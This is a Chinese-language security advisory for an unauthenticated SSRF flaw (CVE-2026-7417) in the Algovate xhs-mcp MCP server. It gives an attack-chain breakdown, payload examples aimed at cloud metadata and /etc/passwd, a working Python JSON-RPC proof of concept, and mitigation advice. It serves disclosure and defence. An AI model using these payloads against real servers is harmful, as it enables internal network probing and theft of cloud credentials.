CVE-2026-7417 Algovate xhs-mcp SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-7417

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Algovate xhs-mcp

漏洞概述

Algovate xhs-mcp 0.8.11版本的MCP接口组件中存在严重的服务器端请求伪造（SSRF）漏洞。该漏洞源于`src/server/mcp.server.ts`文件中的`xhs_publish_content`函数未能正确过滤`media_paths`参数。未经身份验证的远程攻击者可利用此漏洞诱导服务器向恶意或内网地址发起请求，从而造成敏感信息泄露。目前官方尚未发布安全补丁，且公开利用代码已出现，风险较高。

技术细节

该漏洞核心在于Algovate xhs-mcp项目在处理MCP（Model Context Protocol）请求时的输入验证缺失。具体受影响的是`src/server/mcp.server.ts`文件中的`xhs_publish_content`方法。该方法接收`media_paths`参数用于指定媒体文件路径，但未对该参数进行格式校验或协议限制。攻击者可以构造包含内网IP地址（如`http://169.254.169.254/latest/meta-data/`）或本地文件协议（`file:///etc/passwd`）的恶意数据。当服务器端逻辑处理此参数时，会直接发起HTTP请求或文件读取操作，导致SSRF。由于CVSS指标显示无需权限（PR:N）且无用户交互（UI:N），攻击者可轻易批量扫描并利用此漏洞探测内网拓扑或窃取云凭证。

攻击链分析

STEP 1

侦察

攻击者扫描互联网寻找开放的Algovate xhs-mcp服务端点（通常为3000端口或特定MCP接口路径）。

STEP 2

武器化

攻击者构造特制的JSON-RPC数据包，在`xhs_publish_content`方法的`media_paths`参数中填入内网敏感地址（如云元数据服务地址）。

STEP 3

投递

攻击者向目标服务器发送包含恶意载荷的HTTP POST请求，无需任何身份验证即可触发。

STEP 4

利用

服务器端解析`media_paths`参数，并向攻击者指定的内网地址发起HTTP请求，导致SSRF。

STEP 5

后渗透

攻击者根据服务器回显的错误信息或时间延迟，判断内网服务状态，可能进一步窃取云平台凭证或敏感配置文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import json
import requests

# PoC for CVE-2026-7417: SSRF in Algovate xhs-mcp
# Target: The vulnerable MCP server endpoint
target_url = "http://localhost:3000"  # Replace with actual target

# Craft a malicious JSON-RPC request targeting the vulnerable function
payload = {
    "jsonrpc": "2.0",
    "method": "tools/call", # Standard MCP method to call a tool
    "params": {
        "name": "xhs_publish_content",
        "arguments": {
            # The vulnerable parameter 'media_paths' is manipulated
            # to point to an internal resource (e.g., AWS metadata or local file)
            "media_paths": "http://127.0.0.1:8080/admin", 
            "caption": "test"
        }
    },
    "id": 1
}

try:
    response = requests.post(target_url, json=payload)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    # Check response for indicators of success (e.g., error messages containing internal IP content or latency differences)
except Exception as e:
    print(f"Error: {e}")

影响范围

Algovate xhs-mcp <= 0.8.11

防御指南

临时缓解措施

建议在服务器侧实施严格的出站网络访问控制策略，仅允许访问必要的白名单域名。同时，可在防火墙或WAF层面对传入的`media_paths`参数进行特征匹配，拦截包含内网IP段（如127.0.0.1, 192.168.x.x等）或非预期协议（如file://）的请求。暂时禁用受影响的MCP接口功能也是一种有效的临时手段。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7417
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7417
3 Details https://www.cvedetails.com/cve/CVE-2026-7417/
4 VulDB https://vuldb.com/cve/CVE-2026-7417
5 Link https://github.com/Algovate/xhs-mcp/
6 Link https://github.com/Algovate/xhs-mcp/issues/6
7 Link https://github.com/BruceJqs/public_exp/issues/21
8 Link https://vuldb.com/submit/803991
9 Link https://vuldb.com/vuln/360154
10 Link https://vuldb.com/vuln/360154/cti